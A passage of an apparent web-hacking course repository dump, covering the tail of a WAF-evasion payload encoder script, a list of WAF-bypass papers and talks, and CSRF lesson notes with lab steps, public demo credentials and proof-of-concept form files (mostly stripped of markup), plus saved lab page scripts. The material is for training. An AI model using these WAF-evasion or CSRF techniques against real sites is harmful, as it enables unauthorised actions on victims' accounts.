21 | ```
22 | $ python3 obfu.py -s 'param= 1:
57 |         parser.print_help()
58 |         quit()
59 |     print('Input: %s' % (args.str))
60 |     print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))
61 | 
62 | if __name__ == '__main__':
63 |     main()
64 | 


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Artificial Neural Network based WAF for SQL Injection.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Artificial Neural Network based WAF for SQL Injection.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Bypassing WAF XSS Detection Mechanisms.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Bypassing WAF XSS Detection Mechanisms.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Evading All Web-Application Firewalls XSS Filters.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Evading All Web-Application Firewalls XSS Filters.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Poking A Hole In The Firewall.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Poking A Hole In The Firewall.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/SANS Guide - WAF Evasion Testing.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/SANS Guide - WAF Evasion Testing.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/WASC WAF Evaluation Criteria.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/WASC WAF Evaluation Criteria.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Web Application Firewalls - Evaluation and Analysis.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/papers/Web Application Firewalls - Evaluation and Analysis.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/A Forgotten HTTP Invisibility Cloak.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/A Forgotten HTTP Invisibility Cloak.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Methods To Bypass A Web Application Firewall.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Methods To Bypass A Web Application Firewall.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/OWASP WAF Profiling & Evasion.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/OWASP WAF Profiling & Evasion.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Playing Around with WAFs.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Playing Around with WAFs.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/WAF Bypasses and PHP Exploits (Slides).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/WAF Bypasses and PHP Exploits (Slides).pdf


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-7.0_waf_bypass/7.4_firewallBypass_cheatSheet/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf.md:
--------------------------------------------------------------------------------
 1 |  
 2 | 
 3 | [![made-with-html](https://img.shields.io/badge/Made%20with-HTML-1f425f.svg)](https://html.com/)  [![instructure-dr.404](https://img.shields.io/badge/Instructor-Dr.404-brightgreen)](https://www.facebook.com/htunaungkyawMPC)
 4 | 
 5 | 
 6 | 
 7 |  # Cross-Site Request Forgery (CSRF)
 8 | 
 9 |  - an attack that forces an end user `to execute unwanted actions` on a web application in which they’re `currently authenticated`. 
10 | 
11 |  - With a little help of `social engineering` (such as sending a link via email or chat), 
12 | 
13 |  - If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like `transferring funds`, c`hanging their password`, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
14 | 
15 |  [Reference-OWASP](https://owasp.org/www-community/attacks/csrf)
16 | 
17 | ![CSRF](../photo/csrf.png)
18 | 
19 | 
20 | 
21 | # Common defenses against CSRF 
22 | 
23 | [Reference_portswigger.net](https://portswigger.net/web-security/csrf)
24 | 
25 |  The most common defenses are as follows:
26 | 
27 | - CSRF tokens - A CSRF token is a unique, secret, and unpredictable value that is generated by the server-side application and shared with the client. When attempting to perform a sensitive action, such as submitting a form, the client must include the correct CSRF token in the request. This makes it very difficult for an attacker to construct a valid request on behalf of the victim.
28 | 
29 |     
30 | - Referer-based validation - Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. This is generally less effective than CSRF token validation.
31 | 
32 | ![CSRF](../photo/anti_csrf.png)
33 | 
34 | 
35 | # Lab Demo
36 | 
37 | ## Lab Websit
38 | 
39 | `http://testfire.net/login.jsp`
40 | 
41 | ## Lab Credentials
42 | 
43 | ```
44 | username = jsmith   
45 | password = demo1234
46 | 
47 | ```
48 | 
49 | ## Example CSRF POC Form
50 | 
51 | ```html
52 | 
CSRF

53 | 

54 |     
55 |     
56 |     
57 | 

58 | 
61 | 
62 | ```
63 | 
64 | ## Labs Steps
65 | 
66 | 1. Construct `CSRF Form` manaully or using burp suite  `engagement tools (csrf PoC)`.
67 | 
68 | 2. Run web server and send the link to victim
69 | 
70 | 3. Exploit


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_exploit.html:
--------------------------------------------------------------------------------
 1 | 
 2 |   
 3 |   
 4 |   
 5 |     

 6 |       
 7 |       
 8 |     

 9 |     
12 |   
13 | 
14 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_form.html:
--------------------------------------------------------------------------------
1 | 
CSRF

2 | 

3 | 	
4 | 	
5 | 	
6 | 

7 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense.md:
--------------------------------------------------------------------------------
 1 | # Portswigger Lab (CSRF with no defense)
 2 | 
 3 | 
 4 | ## Three key conditions for successful csrf attack:
 5 | 
 6 | - `A relevant action`. There is an action within the application that the attacker has a reason to induce. This might be a privileged action (such as modifying permissions for other users) or any action on user-specific data (such as changing the user's own password).
 7 | 
 8 | - `Cookie-based session handling`. Performing the action involves issuing one or more HTTP requests, and the application relies solely on session cookies to identify the user who has made the requests. There is no other mechanism in place for tracking sessions or validating user requests.
 9 | 
10 | - `No unpredictable request parameters`. The requests that perform the action do not contain any parameters whose values the attacker cannot determine or guess. For example, when causing a user to change their password, `the function is not vulnerable if an attacker needs to know the value of the existing password`.
11 | 
12 | 
13 | 
14 | # Lab Information
15 | 
16 | #### Vulnearable parameter
17 | 
18 | - email change utility
19 | 
20 | #### Login info
21 | 
22 | - `wiener:peter`
23 | 
24 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/academy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/academy.png


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/api.js:
--------------------------------------------------------------------------------
1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LfgVpcUAAAAAMLiC7gC5kn_9oQizGINumO8VgHm');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/releases/RGRQD9tdxHtnt-Bxkx9pM75S/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-W8ETClQtM/DZAB3p5sw146UrQAPyub9gIZYHQB3Ey3l+JjCXJORASw7N7e2EBWxw';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']||e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})();


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/burp-suite-icon.svg:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/burp-suite.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/burp-suite.jpg


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/community.svg:
--------------------------------------------------------------------------------
1 | 
2 |   
3 |     
4 |     
5 |   
6 | 
7 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/dastardly.svg:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/enterprise.svg:
--------------------------------------------------------------------------------
1 | 
2 |   
3 |     
4 |     
5 |   
6 | 
7 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/latest-burp-suite-software-download.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/latest-burp-suite-software-download.jpg


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/portswigger-logo.svg:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 4 | 
 6 | 
10 | 
12 | 
14 | 
18 | 
19 | 
20 | 
24 | 
28 | 
31 | 
33 | 
34 | 
36 | 
37 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/professional.svg:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/register.js:
--------------------------------------------------------------------------------
1 | function PsFormData(n){var t=Object.create(PsFormData.prototype),r,i;if(t.values=[],t.append("ajaxRequest",!0),n)for(r=n.elements,i=0;i{if(!ps.isArray(n))return"";const t=[];return n.forEach((n,i)=>{for(let r in n)n.hasOwnProperty(r)&&t.push(`[${i}].${encodeURIComponent(r)}`+"="+encodeURIComponent(n[r]))}),t.join("&").replace(/%20/g,"+")};ps.ajax=function(n){var e=function(t){try{if(n.done)if(t.status===204)n.done(t,t.status);else{var i=t.getResponseHeader("content-type").startsWith("application/json");n.done(t,t.status,i?JSON.parse(t.responseText):t.responseText)}}catch(r){console.error(r)}},r=function(t){try{n.fail&&n.fail(t,t.status,t.statusText)}catch(i){console.error(i)}},u=function(t){try{n.always&&n.always(t,t.status)}catch(i){console.error(i)}},o=function(n,t){return t instanceof FormData?t:t instanceof PsFormData?(n.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ps.params(t.values)):(n.setRequestHeader("Content-Type","application/json"),JSON.stringify(t))},t=new XMLHttpRequest,i,f;try{if(t.open(n.method||"GET",n.url),n.headers)for(i=0;i=200&&t.status<300||t.status===304?e(t):r(t);u(t)};t.addEventListener("error",function(){r(t);u(t)});n.beforeSend&&n.beforeSend(t);t.send(f)}catch(s){r(t);u(t)}return t};ps.ajaxResultCodes={Error:1,NotFound:2,Redirect:3,Return:4,Ok:5,Warn:6};ps.notificationTypes={Error:"error",Info:"info",Success:"success",Warn:"warn"};ps.string={isNullOrEmpty:function(n){return typeof n=="undefined"||n===null||n.length===0},isNullOrWhiteSpaces:function(n){return typeof n=="undefined"||n===null||n.match(/^ *$/)!==null},isNullOrWhiteSpacesAndNewLines:function(n){return typeof n=="undefined"||n===null||ps.string.isNullOrEmpty(n.replace(/\s+/,""))},isValidHash:function(n){return/^#[a-z0-9-]+$/i.test(n)}};ps.url={isLocalUrl:function(n){return ps.string.isNullOrEmpty(n)?!1:n.charAt(0)!=="/"?!1:n.length===1||n.charAt(1).match(/[a-z0-9]/i)}};UrlHistory.prototype.items=[];UrlHistory.prototype.clear=function(){this.items=[];this.persistData()};UrlHistory.prototype.hasRecords=function(){return this.items.length>0};UrlHistory.prototype.persistData=function(){sessionStorage.setItem("urlHistory",JSON.stringify(this.items))};UrlHistory.prototype.pop=function(){var t=this,n;do n=t.items.pop();while(n===location.pathname);if(t.persistData(),ps.url.isLocalUrl(n))return n;throw new Error("Invalid URL.");};UrlHistory.prototype.push=function(n){var t=this;ps.url.isLocalUrl(n)&&(t.items.length===0||t.items[t.items.length-1]!==n)&&(t.items.push(n),t.persistData())};UrlHistory.prototype.update=function(){var n=this;n.items.length>2&&n.items[n.items.length-3]===n.items[n.items.length-1]&&(n.items.pop(),n.items.pop(),n.persistData())};ps.urlHistory=new UrlHistory;ps.wrapperFunctions.trigger=function(n,t){var i=document.createEvent("Event");i.initEvent(n,!0,!0);i.data=t;this.dispatchEvent(i)};NotificationRenderer.prototype.getDetailsElement=function(n,t){var r=this,i=ps(document.createElement("div"));return i.addClass("notification-detailboxes"),i.addClass("hidden"),i.addClass(t),n.details.forEach(function(n){var t=ps(document.createElement("div")),u,o,f,e;t.addClass("notification-detailbox");u=ps(document.createElement("div"));u.addClass("notification-detailbox-logobox");o=ps(document.createElement("span"));o.addClass(r.getTypeIconClass(n.type,!0));u.appendChild(o);t.appendChild(u);f=ps(document.createElement("div"));f.addClass("notification-detailbox-textbox");e=ps(document.createElement("div"));e.addClass("notification-detailbox-textbox-message");e.appendChild(document.createTextNode(n.message));f.appendChild(e);t.appendChild(f);i.appendChild(t)}),i};NotificationRenderer.prototype.getTypeIconClass=function(n,t){var i;switch(n){case ps.notificationTypes.Error:case ps.notificationTypes.Warn:i=t?"icomoonicon-notification":"icomoonicon-notification2";break;case ps.notificationTypes.Info:case ps.notificationTypes.Success:i=t?"icomoonicon-info":"icomoonicon-info2";break;default:i=""}return i};NotificationRenderer.prototype.getSummaryElement=function(n,t){var a=this,l="",i,f,e,o,h,c,s,r,u;if(n.message||(l="is-messageless"),i=ps(document.createElement("div")),i.addClass("notification-summarybox"),i.addClass(t),f=ps(document.createElement("div")),f.addClass("notification-summarybox-logobox"),f.addClass(l),e=ps(document.createElement("span")),e.addClass("notification-summarybox-logobox-icon"),e.addClass(a.getTypeIconClass(n.type)),e.addClass(l),f.appendChild(e),i.appendChild(f),o=ps(document.createElement("div")),o.addClass("notification-summarybox-textbox"),h=ps(document.createElement("div")),h.addClass("notification-summarybox-textbox-title"),h.appendChild(document.createTextNode(n.title)),o.appendChild(h),c=ps(document.createElement("div")),c.addClass("notification-summarybox-textbox-message"),c.appendChild(document.createTextNode(n.message)),o.appendChild(c),i.appendChild(o),s=ps(document.createElement("div")),s.addClass("notification-summarybox-actionbox"),n.hasDetails()){r=ps(document.createElement("span"));r.addClass("notification-summarybox-actionbox-icon");r.addClass("icomoonicon-circle-up2");r.addClass(t);r.on("click",function(){var n=ps(this);n.toggleClass("icomoonicon-circle-down2");n.trigger("togglenoticationdetails")});s.appendChild(r)}u=ps(document.createElement("span"));u.addClass("notification-summarybox-actionbox-icon");u.addClass("icomoonicon-cancel-circle");u.addClass(t);u.on("click",function(){ps(this).trigger("closenotification")});return s.appendChild(u),i.appendChild(s),i};NotificationRenderer.prototype.getTypeClass=function(n){var t;switch(n){case ps.notificationTypes.Error:t="is-error";break;case ps.notificationTypes.Info:t="is-info";break;case ps.notificationTypes.Success:t="is-success";break;case ps.notificationTypes.Warn:t="is-warn";break;default:t=""}return t};NotificationRenderer.prototype.run=function(n){var r=this,t=ps(document.createElement("div")),i;t.autoClose=n.type===ps.notificationTypes.Info||n.type===ps.notificationTypes.Success;t.close=function(){document.body.removeChild(this)};t.toggleDetails=function(){t.find(".notification-detailboxes")[0].toggleClass("hidden")};t.addClass("notification");i=r.getTypeClass(n.type);t.addClass(i);t.on("mouseover",function(){t.autoClose=!1});t.on("closenotification",t.close);t.on("togglenoticationdetails",t.toggleDetails);t.appendChild(r.getSummaryElement(n,i));n.hasDetails()&&t.appendChild(r.getDetailsElement(n,i));document.body.appendChild(t);t.autoClose&&setTimeout(function(){t.autoClose&&t.close()},8e3)};Notification.prototype.hasDetails=function(){return this.details.length!==0};Notifier.prototype.error=function(n,t){this.notify(new Notification(ps.notificationTypes.Error,n,t))};Notifier.prototype.info=function(n,t){this.notify(new Notification(ps.notificationTypes.Info,n,t))};Notifier.prototype.notify=function(n){(new NotificationRenderer).run(n)};Notifier.prototype.success=function(n,t){this.notify(new Notification(ps.notificationTypes.Success,n,t))};Notifier.prototype.warn=function(n,t){this.notify(new Notification(ps.notificationTypes.Warn,n,t))};AjaxResultProcessor.prototype.defaultResultCallback=function(n){this.displayNotification(n)};AjaxResultProcessor.prototype.displayNotification=function(n){var i=this,u=i.getNotificationType(n.Messages.Summary.Type),f=n.Messages.Summary.Title,r,t;n.Messages.Summary.Value&&(r=n.Messages.Summary.Value);n.Messages.Details.length>0&&(t=[],n.Messages.Details.forEach(function(n){t.push(new NotificationDetail(i.getNotificationType(n.Type),n.Value))}));(new Notifier).notify(new Notification(u,f,r,t))};AjaxResultProcessor.prototype.getNotificationType=function(n){var t;switch(n){case 1:t=ps.notificationTypes.Success;break;case 2:t=ps.notificationTypes.Warn;break;case 3:t=ps.notificationTypes.Error;break;default:t=ps.notificationTypes.Info}return t};AjaxResultProcessor.prototype.handleResult=function(n,t){var i=this,r,u;if(n.Status===ps.ajaxResultCodes.NotFound)window.location.replace("/notfound");else if(n.Status===ps.ajaxResultCodes.Redirect)n.AdditionalData&&typeof n.AdditionalData.ClearUrlHistory=="boolean"&&n.AdditionalData.ClearUrlHistory&&ps.urlHistory.clear(),window.location=n.ResultSet;else if(n.Status===ps.ajaxResultCodes.Return)try{r=ps.urlHistory.pop();ps.url.isLocalUrl(r)?window.location=r:i.reportError()}catch(f){i.reportError()}else u=t||i.defaultResultCallback,u.call(null,n)};AjaxResultProcessor.prototype.reportError=function(){(new Notifier).error("An error has occurred.","Please contact your administrator.")};var KeyCode={Cancel:3,Help:6,BackSpace:8,Tab:9,Clear:12,Enter:13,Shift:16,Control:17,Alt:18,Pause:19,CapsLock:20,Escape:27,Space:32,PageUp:33,PageDown:34,End:35,Home:36,Left:37,Up:38,Right:39,Down:40,PrintScreen:44,Insert:45,Delete:46,Num0:48,Num1:49,Num2:50,Num3:51,Num4:52,Num5:53,Num6:54,Num7:55,Num8:56,Num9:57,SemiColon:59,Equals:61,A:65,B:66,C:67,D:68,E:69,F:70,G:71,H:72,I:73,J:74,K:75,L:76,M:77,N:78,O:79,P:80,Q:81,R:82,S:83,T:84,U:85,V:86,W:87,X:88,Y:89,Z:90,ContextMenu:93,NumPad0:96,NumPad1:97,NumPad2:98,NumPad3:99,NumPad4:100,NumPad5:101,NumPad6:102,NumPad7:103,NumPad8:104,NumPad9:105,Multiply:106,Add:107,Separator:108,Subtract:109,Decimal:110,Divide:111,F1:112,F2:113,F3:114,F4:115,F5:116,F6:117,F7:118,F8:119,F9:120,F10:121,F11:122,F12:123,F13:124,F14:125,F15:126,F16:127,F17:128,F18:129,F19:130,F20:131,F21:132,F22:133,F23:134,F24:135,NumLock:144,ScrollLock:145,Comma:188,Period:190,Slash:191,BackQuote:192,OpenBracket:219,BackSlash:220,CloseBracket:221,Quote:222,Meta:224},loadToken=function(n,t,i){var r,u;if(typeof grecaptcha!="undefined"){if(isGRecaptchaV2(i)){for(r=document.getElementsByName("g-recaptcha-response");r.length!==0;)r[0].name="RecaptchaV2Token";t(i);return}u=document.getElementById("RecaptchaClientSecret-"+i).value;grecaptcha.ready(function(){grecaptcha.execute(u,{action:n}).then(function(n){document.getElementById("RecaptchaToken-"+i).value=n;t(i)})})}},isGRecaptchaV2=function(n){var t=document.getElementById("RecaptchaRenderLocation-"+n);return t&&t.children.length>0},removeRecaptchaMasks=function(){var n=document.querySelectorAll(".recaptchaloadingmask");n.forEach(n=>n.classList.remove("recaptchaloadingmask"))},renderRecaptchaV2=function(n){var t,i;typeof grecaptcha!="undefined"&&(t=document.getElementById("RecaptchaRenderLocation-"+n),t.children.length===0?(i=document.getElementById("RecaptchaV2ClientSecret-"+n).value,grecaptcha.ready(()=>{grecaptcha.render(t,{sitekey:i})})):resetAllV2Recaptchas())},resetAllV2Recaptchas=function(){for(var t=document.querySelectorAll("[id^='RecaptchaRenderLocation-']"),i=Array.from(t).filter(n=>n.children.length>0),r=i.length,n=0;n=0;n--)t[n].classList.add("hidden");else removeRecaptchaMasks();typeof recaptchaEventSetup=="undefined"&&(recaptchaEventSetup=!0,document.readyState==="complete"||document.readyState==="interactive"?loadRecaptchaScript():document.addEventListener("DOMContentLoaded",loadRecaptchaScript))},loadRecaptchaScript=function(){if(typeof recaptchaClientUrl!="string"){recaptchaErrored();return}var t=document.querySelector("[id^='RecaptchaClientSecret-']").value,n=document.createElement("script");n.id="RecaptchaScript";n.async=!0;n.src=recaptchaClientUrl+t;n.onload=function(){var t,n;for(removeRecaptchaMasks(),t=document.getElementsByClassName("disable-no-recaptcha"),n=t.length-1;n>=0;n--)t[n].classList.remove("hidden")};n.onerror=function(){recaptchaErrored()};document.querySelector("body").appendChild(n)},recaptchaErrored=function(){removeRecaptchaMasks();document.querySelectorAll("[id^='NoRecaptcha-']").forEach(n=>{n.classList.remove("hidden")})},initOwnCaptcha=function(n,t){document.getElementById("CaptchaRefresh-"+n).addEventListener("click",refreshCaptchaImageEventHandler);document.getElementById("RecaptchaToken-"+n).addEventListener("keypress",t)},initCaptcha=function(n,t){isRecaptchaEnabled()?initRecaptcha():isOwnCaptchaEnabled()&&initOwnCaptcha(n,t)},refreshCaptchaImageEventHandler=function(n){var t=n.target.closest("[id^='Recaptcha-']").querySelector("[id^='CaptchaImg-']");refreshCaptchaImages(t);n.preventDefault()},refreshCaptchaImages=function(n){var i,t;(n||(n=document.querySelector("[id^='CaptchaImg-']")),n)&&(i=n.src.includes("refresh=true"),i||(t=document.querySelectorAll("[id^='CaptchaImg-']"),n.addEventListener("load",()=>{for(var i=0;i{if(n.includes(t))return!0})},isRecaptchaError=function(n){return recaptchaErrors.map(n=>n.toLowerCase()).includes(n.toLowerCase())};_widgets=_("[id^='RegistrationWidget-']");initRegistrationWidget(_widgets)


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/saved_resource(1).html:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/saved_resource.html:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 


--------------------------------------------------------------------------------
/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/tailored-quote.png:
--------------------------------------------------------------------------------
